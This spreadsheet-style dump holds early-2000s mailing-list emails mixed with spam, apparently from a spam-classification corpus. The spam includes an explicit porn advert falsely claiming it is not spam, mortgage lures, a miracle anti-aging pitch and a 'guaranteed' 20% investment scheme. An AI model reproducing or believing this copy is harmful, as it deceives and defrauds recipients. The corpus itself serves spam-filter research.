 &gt; To make some sense of the data, I need to relate the Docket number between the 2 files, so that I can generate a report by customer.
 &gt; 
 &gt; My first reaction is to look at mysql, and import the ascii data into 2 tables so that I can use sql queries.
 &gt; 
 &gt; Is this the way to go, or should I delve a bit deeper into perl ?
 &gt; 
 &gt; Any advice welcome.
 man join
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Re: whats up -colonize
</t>
  </si>
  <si>
    <t xml:space="preserve">
 YOU HAVE NEVER SEEN A DILDO SITE LIKE THIS ONE!!
 Extreme never seen before pictures and content
 http://www.supremewebhosting-online.com/users/k/katrina/
 Join in the fun as the girls REAM in objects like never before
 http://www.supremewebhosting-online.com/users/k/katrina/
 This is NOT SPAM - You have received this e-mail because at one time or another you
 entered the weekly draw at one of our portals or sites. We comply with all proposed and
 current laws on commercial e-mail under (Bill s. 1618 TITLE III passed by the 105th Congress).
 If you have received this e-mail in error, we apologize for the inconvenience and ask
 that you remove yourself. Just go to http://200.38.128.154/
 hardships
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: don't Pay another monthly Bill until you read thisDGSRW
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#ffffb9" lang=3DEN-US link=3Dblue vlink=3Dblue style=3D't=
 ab-interval:.5in'&gt;
 &lt;p align=3Dcenter style=3D'text-align:center'&gt;&amp;nbsp;&lt;/p&gt;
 &lt;div align=3Dcenter&gt;
 &lt;table border=3D0 cellpadding=3D0 width=3D521 bgcolor=3Dwhite style=3D'wid=
 th:390.75pt;
  mso-cellspacing:1.5pt;background:white;border:outset #CCCC66 6.0pt;mso-pa=
 dding-alt:
  7.5pt 7.5pt 7.5pt 7.5pt' height=3D501&gt;
  &lt;tr style=3D'height:334.5pt'&gt;
   &lt;td style=3D'border:inset #CCCC66 .75pt;padding:7.5pt 7.5pt 7.5pt 7.5pt;
   height:334.5pt'&gt;
   &lt;div align=3Dcenter&gt;
   &lt;table border=3D1 cellspacing=3D0 cellpadding=3D0 width=3D307 style=3D'w=
 idth:230.25pt;
    mso-cellspacing:0in;border:none;mso-padding-alt:0in 0in 0in 0in'&gt;
    &lt;tr style=3D'height:6.0pt'&gt;
     &lt;td style=3D'border:none;padding:0in 0in 0in 0in;height:6.0pt'&gt;
     &lt;p class=3DMsoNormal align=3Dcenter style=3D'text-align:center;mso-lin=
 e-height-alt:
     6.0pt'&gt;&lt;b&gt;&lt;u&gt;&lt;span style=3D'font-size:13.5pt;font-family:Verdana;color=
 :#3333CC'&gt;Home Mortgage Network&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;
     &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;  &lt;p class=3DMsoNormal align=3Dcenter style=3D=
 'text-align:center'&gt;&lt;/p&gt;
   &lt;div align=3Dcenter&gt;
   &lt;table border=3D1 cellspacing=3D0 cellpadding=3D0 width=3D307 style=3D'w=
 idth:230.25pt;
    mso-cellspacing:0in;border:none;mso-padding-alt:0in 0in 0in 0in'&gt;
    &lt;tr style=3D'height:1.5pt'&gt;
     &lt;td style=3D'border:none;padding:0in 0in 0in 0in;height:1.5pt'&gt;
     &lt;p class=3DMsoNormal align=3Dcenter style=3D'text-align:center;mso-lin=
 e-height-alt:
     1.5pt'&gt;&lt;b&gt;&lt;span style=3D'font-size:7.5pt;font-family:Verdana;color:#CC=
 3300'&gt;Home
     of America's Most Liberal Lenders&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
     &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;b&gt;&lt;span style=3D'font-siz=
 e:18.0pt;
   font-family:Verdana;color:#CC3300'&gt;INTEREST RATES&lt;/span&gt;&lt;/b&gt;&lt;br&gt;
 &lt;b&gt;&lt;span style=3D'font-size:13.5pt;font-family:Verdana'&gt;Are Still at
   an all time Low!&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;span style=3D'font-size:1=
 0.0pt;
   font-family:Verdana'&gt;This is a great time to refinance your home, consol=
 idate
   all of your&lt;br&gt;
   bills and high interest credit card debt, and get the cash you need!&lt;/sp=
 an&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;b&gt;&lt;span style=3D'font-siz=
 e:13.5pt;
   font-family:Verdana;color:#003399'&gt;All Homeowners in the USA easily qual=
 ify!&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;b&gt;&lt;span style=3D'font-siz=
 e:13.5pt;
   font-family:Verdana;color:#CC3300'&gt;Damaged credit is never a problem!&lt;/s=
 pan&gt;&lt;/b&gt;&lt;br&gt;
   &lt;span style=3D'font-size:10.0pt;font-family:Verdana'&gt;&amp;quot;We have
   Special Programs for every type of Credit History&amp;quot;&lt;/span&gt;&lt;b&gt;
 &lt;span style=3D'font-size:10.0pt;font-family:Verdana;color:#003399'&gt;&lt;br&gt;
   No Upfront Fees - No Hidden Fees - Get Cash Fast for...&lt;/span&gt;&lt;/b&gt;&lt;br&gt;
 &lt;/b&gt;&lt;span style=3D'font-size:7.5pt;font-family:Verdana;color:#000099'&gt;Home
   Improvement * 2nd Mortgage *&lt;/span&gt; &lt;span style=3D'font-size:7.5pt;font-=
 family:
   Verdana;color:#000099'&gt;Refinance * Credit Repair * College Tuition&lt;br&gt;
   Debt Consolidation * A Dream Vacation * A New Business * Any Purpose &lt;/s=
 pan&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;span style=3D'font-size:1=
 0.0pt;
   font-family:Verdana'&gt;We work with the nation's top lenders... and they'r=
 e
   hungry for your business. We will get you the best loan to meet your nee=
 ds!&lt;/span&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;b&gt;&lt;span style=3D'font-siz=
 e:10.0pt;
   font-family:Verdana;color:#CC3300'&gt;Our service is 100% free - and there =
 is NO
   obligation!&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;b&gt;&lt;span style=3D'font-siz=
 e:10.0pt;
   font-family:Verdana;color:#003399'&gt;Applying is easy.&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span
   style=3D'font-size:13.5pt;font-family:Verdana;color:blue'&gt;&lt;a
   href=3D"http://www.interactive-mailing.com/b012/mortgage/"&gt;Enter Here&lt;/a=
 &gt;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span
   style=3D'font-size:10.0pt;font-family:Verdana;color:#003399'&gt;for a Quote=
  Today!&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;b&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;span style=3D'color:blue'=
 &gt;***********************************************************&lt;/span&gt;&lt;/p&gt;
   &lt;/td&gt; &lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;
 &lt;p align=3Dcenter style=3D'text-align:center'&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align=3Dcenter style=3D'margin-bottom:12.0pt;text-align:center'&gt;&amp;nbsp;&lt;=
 /p&gt;
 &lt;div align=3Dcenter&gt;
 &lt;table border=3D0 cellspacing=3D0 cellpadding=3D0 width=3D551 style=3D'wid=
 th:413.25pt;
  mso-cellspacing:0in;mso-padding-alt:3.0pt 3.0pt 3.0pt 3.0pt' height=3D26&gt;
  &lt;tr style=3D'height:32.25pt'&gt;
   &lt;td style=3D'padding:3.0pt 3.0pt 3.0pt 3.0pt;height:32.25pt'&gt;
   &lt;p class=3DMsoNormal&gt; &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;span style=3D'font-size:7.5pt;font-family:Verdana;
   color:#999999'&gt;We search for the best offering's for&lt;br&gt;
 you; we do the research and you get only The superior results&lt;br&gt;
 this  email is brought to you by; TMC. . To abnegate&lt;br&gt;
 all future notices, please &lt;A HREF=3D"http://www.interactive-mailing.com/b=
 012/"&gt;Enter here&lt;/A&gt;&lt;/span&gt;&lt;/p&gt;
   &lt;/td&gt;
  &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Guaranteed to lose 10-12 lbs in 30 days                          11.150
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2002-07-24 at 03:50, Angles Puglisi wrote:
 &gt; Lance (lance_tt@bellsouth.net) wrote*:
 &gt; &gt;
 &gt; &gt;well, from the looks of things, Evolution mail client isn't supported
 &gt; &gt;just yet, so I reckon I'll wait a bit.  Whoever posted these gnome2 apt
 &gt; &gt;repositories, thanks!!!
 &gt; &gt;
 &gt; 
 &gt; I'm uising Havoc Pennington's Gnomehide and it rocks. I installed it before I
 &gt; knew about apt, but one of the previous emails had an apt repository that
 &gt; claimed to have gnomehide. Just remember there is one kew file that makes the
 &gt; difference between Gnome1 and Gnome2 being used. I *think* it is "gnome-core"
 &gt; vs. "gnome-session" but I can not remember.
 &gt; 
 &gt; Note that that those same files are probably in the Limbo beta, except
 &gt; updated. There has not been a major change to "gnomehide" in a while, I
 &gt; suspect Havoc's work went into Limbo then.
 Right, gnomehide is only updated when it's been a while since the last
 red hat release, and the next beta isn't out yet. Since the beta is out
 now, gnomehide won't be updated again for a while.
 Julian
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">
 EL&gt; On Mon, 9 Sep 2002 bitbitch@magnesium.net wrote:
 &gt;&gt; So Eugen, how many of your homo friends have -had- 3k lovers?
 EL&gt; Just one. Not everybody does that. Most of them are now dead, anyway.
 Point is, you're not likely to extrapolate much.  I could probably
 find one hetero who had just as much sex.   Does that mean we're all
 rampant hos?  No.
 &gt;&gt; Eegads, if you're hypothesizing numbers like -that- Eugen, you at
 &gt;&gt; least owe it to FoRK to back that shit up.
 EL&gt; Ain't done no hypothesizing. Anecdotal evidence'R'Us. Couldn't you just
 EL&gt; Google, or something?
 Listen.  If you pull numbers like that without a fact, the automagic
 assumption is yes, they were extracted out of your neither orifice.
 Point wasn't to conclude otherwise unless you had any relevant bits.
 Its not my job to do _your_ bit searching for you, but I figured I'd
 humor fork with this bit of finding:
 http://www.thebody.com/bp/apr01/research_notebook.html  (Pointing ot
 averages of about 13 for every 3 months (for gay men), which totals to
 about  52 a year.  52 a year doesn't equal 3000.   Or even 300.
 &gt;&gt; Just a quick assumption here.   I'm not a math geek or anything, but
 &gt;&gt; assuming 1 lover every day, that would be like at least one lover
 &gt;&gt; everyday for 8 years and some change.   I don't know about you, but
 &gt;&gt; very very few of us are -that- lucky (or even close to that lucky)
 EL&gt; Which was my point. Gurls don't do hyperpromiscuity as a life style. It's
 EL&gt; interesting that you're launching into a diatribe, and threaten using
 EL&gt; instant argument (just add hominem) instead of assuming I might be not
 EL&gt; just pulling this whole thing out my nether orifice.
 WTF do my shitty math skillz have to do with girls and
 hyperpromiscuity?  I was speaking -generally- meaning that guys and
 girls probably have better things to do than boink everything they
 see.  As above, I am assuming you're pulling things out of your ass, I
 just felt like calling you on it.
 BTW, there's nothing wrong with calling someone on a silly idea.  Its
 allowed, and its generally not considered ad hominem, but the
 homophobia statement might be.
 &gt;&gt; and after awhile, even the sexaholics get bored and have to mingle
 &gt;&gt; something new into their weekends.   You really are assumiing that the
 &gt;&gt; homosexual population is a) that large in a given area (The meccas
 EL&gt; You ever been to San Francisco?
 Many times.  Which is why I said 'assuming that large ... (The meccas
 dont count).  SF is a mecca in this example.  I obviously wasn't
 clear, tho one could assume I wasn't talking about Medina.
 &gt;&gt; a few nifty gaybars, but thats a different story)  b) that bored/sex
 &gt;&gt; obsessed/recreationally free to pursue sex that often, with that many
 &gt;&gt; partners or that they'd even WANT that many partners.
 EL&gt; This doesn't happen because it couldn't happen. No one would want to. 
 EL&gt; Because you feel that way. Correct?
 doesn't happen?  true.   Couldn't happen?  who knows.   It has nothing
 to do with how I 'feel' and everything to do with the fact that people
 do concern themselves with more than just sex (otherwise I think we'd
 see a helluva lot more of sex, and a helluva lot less of everything
 else).
 &gt;&gt; Qualify yourself, or at least lower your outrageous numbers.
 EL&gt; I didn't expect so much reflexive knee-jerking on this list.
 Well my suggestion is, if you can't take the responses, don't post
 flamebait.
 -- 
 Best regards,
  bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --1sNVjLsmu1MXqwQ/
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 On Mon, Sep 02, 2002 at 06:53:24PM +0100, Justin Mason wrote:
 &gt;   - Razor v2 now supported fully
 Hmmm...  I just upgraded from my modified 2.31 to a slightly modified 2.40
 (I add a routine to EvalTests) and get:
 Sep  2 15:32:24 eclectic spamd[20506]: razor2 check skipped: No such file o=
 r directory Can't call method
 "log" on unblessed reference at /usr/lib/perl5/site_perl/5.6.1/Razor2/Clien=
 t/Agent.pm line 211, &lt;STDIN&gt;
 line 22.=20
 I haven't quite figured out why yet, more to come.
 --=20
 Randomly Generated Tagline:
 "So on one hand, honey is an amazingly sophisticated and efficient food
  source. On the other hand it's bee backwash."
              - Alton Brown, Good Eats, "Pantry Raid IV: Comb Alone"
 --1sNVjLsmu1MXqwQ/
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE9c8zVAuOQUeWAs2MRAm+8AKC24InxYaZY5BJi/u/FI2RQ5hy9jACgi9fM
 4jujLQNmvwcQm/8ULtyvaZU=
 =hKgW
 -----END PGP SIGNATURE-----
 --1sNVjLsmu1MXqwQ/--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] RE: Argh!
</t>
  </si>
  <si>
    <t xml:space="preserve">I think I understand the feeling.  A few years ago I caught up with
 a couple of old fiancs, both now authors and notable in their
 field.  One is a minor celebrity - perhaps I should say 'was'
 because fame can be so fleeting and I do not know the
 current status but she still commands buck$ on the lecture
 circuit.  I authored some technical material through the
 years which are probably long forgotten.  I am also 'notable',
 sort of, kind of, in some very narrow fields (how many
 mando-bass artists could there be?) so have that
 feather in my cap if I cared about it.
 I feel I am only a little jealous or depressed thinking about my
 own accomplishments (or lack thereof) - what does
 bug me is that these 2 probably have some real good
 juicy stories and I'm not getting to hear any of them!!
 That's one reason I love this list...
 - Steve
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">At 4:34 PM -0400 on 10/2/02, R. A. Hettinga wrote:
 &gt; --- begin forwarded text
 &gt;
 &gt;
 &gt; Status: RO
 &gt; Delivered-To: fork@example.com
 Sigh. Shoot me, now...
 My apologies.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</si>
  <si>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Re: [SAdev] Live Rule Updates after Release ???
</t>
  </si>
  <si>
    <t xml:space="preserve">Yes - great minds think alike. But even withput eval rules it would be very 
 useful. It would allow us to respond quickly to spammer's tricks.
 Theo Van Dinter wrote:
 &gt; On Thu, Aug 22, 2002 at 07:27:52AM -0700, Marc Perkel wrote:
 &gt; 
 &gt;&gt;Has anyone though of the idea of live updates of rules after release? The 
 &gt;&gt;idea being that the user can run a cron job once a week or so and get the 
 &gt;&gt;new default rule set. This would allow us to react faster to:
 &gt; 
 &gt; 
 &gt; I suggested this a few months ago.  I don't remember the details of what
 &gt; came out of it except that it would only be useful for non-eval rules
 &gt; since those require code changes.
 &gt;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</si>
  <si>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Plan to recover nuclear gas rejected
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8714364,1440/
 Date: Not supplied
 The UK Environment Agency plans to allow a trebling of emissions of a 
 radioactive gas produced in reactors - a decision dubbed "spineless" by critics
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Snag Ware
</t>
  </si>
  <si>
    <t xml:space="preserve">Joseph S. Barrera III:
 &gt;I just use the free/adware version of Opera. I mean,
 &gt;half the pages I look at have ads on them anways ..
 I didn't mind the ads. The problem is that the ad
 server Opera puts on your machine is a PIG. Every
 time it goes to change the ad, it thrashes my
 laptop for thirty seconds. So no, I don't mind
 the ad, but I do mind that serving ads cripples
 the browser.
 Alas, Mozilla is also a PIG. So I'm back to using
 IE, which seems to be the only free, reasonably
 featured browser that runs decently on my laptop.
 I'm open to alternatives ..
 _________________________________________________________________
 MSN Photos is the easiest way to share and print your photos: 
 http://photos.msn.com/support/worldwide.aspx
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: best mortgage rate              GZRHTKJ
</t>
  </si>
  <si>
    <t xml:space="preserve">As to
 Want to refinance?
 Fill out this quick form and immediately have mortgage
 companies compete for you business. 
 You will be offered the, absolute, BEST refinance rates 
 available!
 Your credit doesn't matter, don't even worry about past 
 credit problems, we can refinance ANYONE!
 Let Us Put Our Expertise to Work for You!
 http://save.ac2002.net
 Erase
 http://save.ac2002.net/optout.htm
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: .* Mortgage Approved!!*
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00A5_72D33D8C.C3665C01
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 PHRhYmxlIHdpZHRoPSI3MTUiPg0KICA8dHI+DQogICAgPHRkIHZBbGlnbj0i
 dG9wIiBhbGlnbj0ibGVmdCIgd2lkdGg9IjUxMSI+DQogICAgICA8Zm9udCBj
 b2xvcj0iI0ZGRkZGRiI+d3lvbWluZzwvZm9udD4NCiAgICAgIDxibG9ja3F1
 b3RlPg0KICAgICAgICA8Zm9udCBjb2xvcj0ibmF2eSIgc2l6ZT0iNCI+PGZv
 bnQgZmFjZT0iYXJpYWwiIGNvbG9yPSJyZWQiIHNpemU9IjMiPjxiPjxpPiZx
 dW90O05vdw0KICAgICAgICBpcyB0aGUgdGltZSB0byB0YWtlIGFkdmFudGFn
 ZSBvZiBmYWxsaW5nIGludGVyZXN0IHJhdGVzISBUaGVyZSBpcyBubw0KICAg
 ICAgICBhZHZhbnRhZ2UgaW4gd2FpdGluZyBhbnkgbG9uZ2VyLiZxdW90Ozwv
 aT48L2I+PGJyPg0KICAgICAgICA8YnI+DQogICAgICAgIDwvZm9udD48Zm9u
 dCBzaXplPSIzIj5SZWZpbmFuY2Ugb3IgY29uc29saWRhdGUgaGlnaCBpbnRl
 cmVzdCBjcmVkaXQgY2FyZA0KICAgICAgICBkZWJ0IGludG8gYSBsb3cgaW50
 ZXJlc3QgbW9ydGdhZ2UuIE1vcnRnYWdlIGludGVyZXN0IGlzIHRheCBkZWR1
 Y3RpYmxlLA0KICAgICAgICB3aGVyZWFzIGNyZWRpdCBjYXJkIGludGVyZXN0
 IGlzIG5vdC48YnI+DQogICAgICAgIDxicj4NCiAgICAgICAgWW91IGNhbiBz
 YXZlIHRob3VzYW5kcyBvZiBkb2xsYXJzIG92ZXIgdGhlIGNvdXJzZSBvZiB5
 b3VyIGxvYW4gd2l0aCBqdXN0DQogICAgICAgIGEgMC4yNSUgZHJvcCBpbiB5
 b3VyIHJhdGUhPGJyPg0KICAgICAgICA8YnI+DQogICAgICAgIE91ciBuYXRp
 b253aWRlIG5ldHdvcmsgb2YgbGVuZGVycyBoYXZlIGh1bmRyZWRzIG9mIGRp
 ZmZlcmVudCBsb2FuDQogICAgICAgIHByb2dyYW1zIHRvIGZpdCB5b3VyIGN1
 cnJlbnQgc2l0dWF0aW9uOg0KICAgICAgICA8YmxvY2txdW90ZT4NCiAgICAg
 ICAgICA8Zm9udCBjb2xvcj0icmVkIj48Yj4NCiAgICAgICAgICA8dWw+DQog
 ICAgICAgICAgICA8bGk+UmVmaW5hbmNlDQogICAgICAgICAgICA8bGk+U2Vj
 b25kIE1vcnRnYWdlDQogICAgICAgICAgICA8bGk+RGVidCBDb25zb2xpZGF0
 aW9uDQogICAgICAgICAgICA8bGk+SG9tZSBJbXByb3ZlbWVudA0KICAgICAg
 ICAgICAgPGxpPlB1cmNoYXNlPC9saT4NCiAgICAgICAgICA8L3VsPg0KICAg
 ICAgICAgIDwvYj4NCiAgICAgICAgICA8L2Jsb2NrcXVvdGU+DQogICAgICAg
 IDwvZm9udD4NCiAgICAgICAgPHAgYWxpZ249ImNlbnRlciI+PGZvbnQgc2l6
 ZT0iNCI+TGV0DQogICAgICAgIHVzIGRvIHRoZSBzaG9wcGluZyBmb3IgeW91
 Li4uPGEgaHJlZj0iaHR0cDovLzIxMS45MS4yMC4xNjMvaG9zdC9Zb3VyQXBw
 cm92ZWQvIiB0YXJnZXQ9Il9ibGFuayI+SVQgSVMgRlJFRSE8YnI+DQogICAg
 ICAgIENMSUNLIEhFUkUmcXVvdDs8L2E+PC9mb250PjwvcD4NCiAgICAgICAg
 PHAgYWxpZ249ImNlbnRlciI+Jm5ic3A7PC9wPg0KICAgICAgICA8cCBhbGln
 bj0iY2VudGVyIj4mbmJzcDs8L3A+DQogICAgICAgIDxwIGFsaWduPSJjZW50
 ZXIiPiZuYnNwOzwvcD4NCiAgICAgICAgPHAgYWxpZ249ImNlbnRlciI+Jm5i
 c3A7PC9wPjwvZm9udD48L2ZvbnQ+PHAgYWxpZ249ImNlbnRlciI+PGZvbnQg
 c2l6ZT0iNCIgY29sb3I9IiMwMDAwODAiPlRvDQogICAgICBiZSByZW1vdmVk
 IGZyb20gb3VyIG1haWxpbmcgbGlzdCA8YSBocmVmPSJodHRwOi8vMjExLjkx
 LjIwLjE2My9ob3N0L3JlbW92ZS8iPkNsaWNrDQogICAgICBIZXJlPC9hPjwv
 Zm9udD48L3A+DQogICAgICAgIDxmb250IGNvbG9yPSJuYXZ5IiBzaXplPSI0
 Ij48Zm9udCBzaXplPSIzIj4NCiAgICAgICAgPHAgYWxpZ249ImNlbnRlciI+
 Jm5ic3A7PC9wPg0KMzY0Mm1jcEM1LTg4ME53cUs4MDA2VGJ6VDctOTk4Ynda
 dzU4NzVBeUNMMi0wNTdZTEtTODgwM25kT0s3LTQ3N0RsVGkxOTE4bm1sNzA=
</t>
  </si>
  <si>
    <t xml:space="preserve">LOL!  They're not doomed at all.  Thousands of men wear cb2000s to work 
 every day (along with other chastity devices).    They are not just 
 decorations.  You will not get a woody or have an orgasm until your 
 keyholder allows you to.  Anyhow, I know better than to have this 
 type of conversation with a 'nilla, but these men wear these happily, and 
 consensually.  (:  There is little power struggle in the lifestyles of the 
 people who use these.  There is power exchange instead.  Lots of 
 variations on the definition, but this one's from Gloria Brame's site:
 Power exchange: the consensual transfer of power by the submissive to the 
 dominant. The exchange takes place when the returned energy from the 
 dominant empowers the submissive. 
 Anyhow, there are tons of informative sites out there for anyone who cares 
 to read them, but I assure you, the chastity device business is doing very 
 well, and it is illegal to force someone to wear one.  It's not coercion, 
 it is creative sensuality.  (:
 Cindy
 On Thu, 5 Sep 2002, Eirikur Hallgrimsson wrote:
 &gt; On Wednesday 04 September 2002 10:59 pm, CDale wrote:
 &gt; &gt; Someone needs to tell the mayor about this:
 &gt; &gt; http://www.cb-2000.com/
 &gt; 
 &gt; "Chastity" technologies were doomed from the start, and I'll add chemical 
 &gt; ones to the trash heap.  (Yeah, Cindy, these are decorative toys for the 
 &gt; subculture, but....)  
 &gt; 
 &gt; Generally,someone is attempting to preserve a relationship with this 
 &gt; nonsense, when quite plainly the the relationship is in a state where 
 &gt; preserving it is of little value.  Hardware is of no real use save for 
 &gt; playing the power-struggle game.   I don't want to see the future of this.
 &gt; "Invisible Fence" for your mate.   "Must wear" location transponders and 
 &gt; endocrine monitors.   More movies like "Minority Report."
 &gt; 
 &gt; It seems so automatic for people to reach for coercive solutions.   So 
 &gt; surprizing given the low absolute effectiveness of coercion in the absense 
 &gt; of overwhelming force advantage.
 &gt; 
 &gt; Eirikur
 &gt; 
 &gt; 
 &gt; 
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Start now look great this summer
</t>
  </si>
  <si>
    <t xml:space="preserve">As seen on NBC, CBS, CNN, and even Oprah! The health 
 discovery that actually reverses aging while burning fat, 
 without dieting or exercise! This proven discovery has even 
 been reported on by the New England Journal of Medicine. 
 Forget  aging and dieting forever! And it's Guaranteed!   
 Click here:
 http://66.231.133.205/hgh/index.html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
 You are receiving this email as a subscriber
 to the Opt-In America Mailing List. 
 To unsubscribe from future offers,
 just click here:
 mailto:affiliateoptout@btamail.net.cn?Subject=off
 x
</t>
  </si>
  <si>
    <t xml:space="preserve">
     DanQ&gt; I think it would make more sense to start Habeas with a less
     DanQ&gt; aggressive score (one which will not give spammers a quick path
     DanQ&gt; into everyone's inbox) and after we've seen evidence that the
     DanQ&gt; system works, then we can increase the magnitude of the score.
 Better yet, let the GA figure out the correct score. ;-) That will obviously
 take awhile since you'll have to acquire enough messages with it, but it
 should give you a good idea if the presence of Habeus headers are good spam
 indicators or not.  If they are, my guess is that Habeus will probably not
 succeed.
 Taking things further off-topic: Does Habeus charge a license fee to
 organizations who want to use their copyrighted material or is their sole
 revenue stream to come from legal judgements?  On the one hand, if they
 charge license fees, I'd worry that when times got tough they'd be somewhat
 less critical of organizations we'd call spammers today in order to generate
 license fees.  If not, I'd worry the pendulum would swing the other way and
 they'd go after legitimate businesses in an attempt to generate more
 revenues from judgements and/or out of court settlements.  Either way, it
 seems like they have an interesting tightrope to walk.
 -- 
 Skip Montanaro
 skip@pobox.com
 consulting: http://manatee.mojam.com/~skip/resume.html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</si>
  <si>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Strong Annual Returns Guaranteed and Fully Secured 25780
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Make 20% In 9 Months-Fully Secured!
 Investor Alert:
 Is the stock market roller coaster making you worried?
 Join the flight to quality. Make 20% in 9 months!!!
 Earn over 2% monthly through fully secured Accounts
 Receivable Acquisitions-prepaid monthly in advance!!!
 You heard right-over 2% monthly prepaid in advance!
 Discover what banks have been doing for decades.
 Harness the power &amp; liquidity of fully secured accounts
 receivable acquisitions.
 Look into our safe haven with a return of 20% in 9 months-
 earn over 2% monthly, prepaid in advance!
 Contact us for your "FREE" In-Depth Information Package.
 Just fill out the form at our website!
 http://205.232.135.76/20percent
 (REMOVAL INSTRUCTIONS)
 This mailing is done by an independent marketing company.
 We respect your online privacy and apologize if you have
 received this message in error. We do respect our remove lists!
 Please do not use the reply to this e-mail, an e-mail reply
 cannot be read! If you would like to be removed from our mailing
 list just click below and send us a remove request email.
 (To Be Removed)
 mailto:nada4me@europe.com?subject=Remove*ARA
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
            &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;&lt;FONT size=2 PTSIZE="10"&gt;
       &lt;TABLE 
       style="BORDER-RIGHT: #006600 12px double; PADDING-RIGHT: 4px; BORDER-TOP: #006600 12px double; PADDING-LEFT: 4px; PADDING-BOTTOM: 1px; BORDER-LEFT: #006600 12px double; PADDING-TOP: 1px; BORDER-BOTTOM: #006600 12px double; BORDER-COLLAPSE: collapse" 
       borderColor=#111111 height=338 cellSpacing=0 borderColorDark=#ffffff 
       cellPadding=0 width=539 borderColorLight=#ffffff border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=4 height=423&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD 
           style="BORDER-RIGHT: 0px solid; BORDER-TOP: 0px solid; BORDER-LEFT: 0px solid; BORDER-BOTTOM: 0px solid" 
           vAlign=top align=left width=535 height=423&gt;
             &lt;TABLE style="BORDER-COLLAPSE: collapse" borderColor=#111111 
             cellSpacing=0 cellPadding=4 width="95%" bgColor=#ffffff border=0&gt;
               &lt;TBODY&gt;
               &lt;TR&gt;
                 &lt;TD vAlign=top align=right height=424&gt;
                   &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
                     &lt;TR&gt;
                       &lt;TD&gt;
                         &lt;DIV align=left&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
                         size=2&gt;&lt;B&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
                         color=#000000 size=2&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;FONT 
                         color=#000000&gt;&lt;B&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;Dear 
                         Homeowner,&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;
                         &lt;DIV align=left&gt;&amp;nbsp;&lt;/DIV&gt;
                         &lt;DIV align=center&gt;&lt;B&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif"&gt;*&lt;/FONT&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
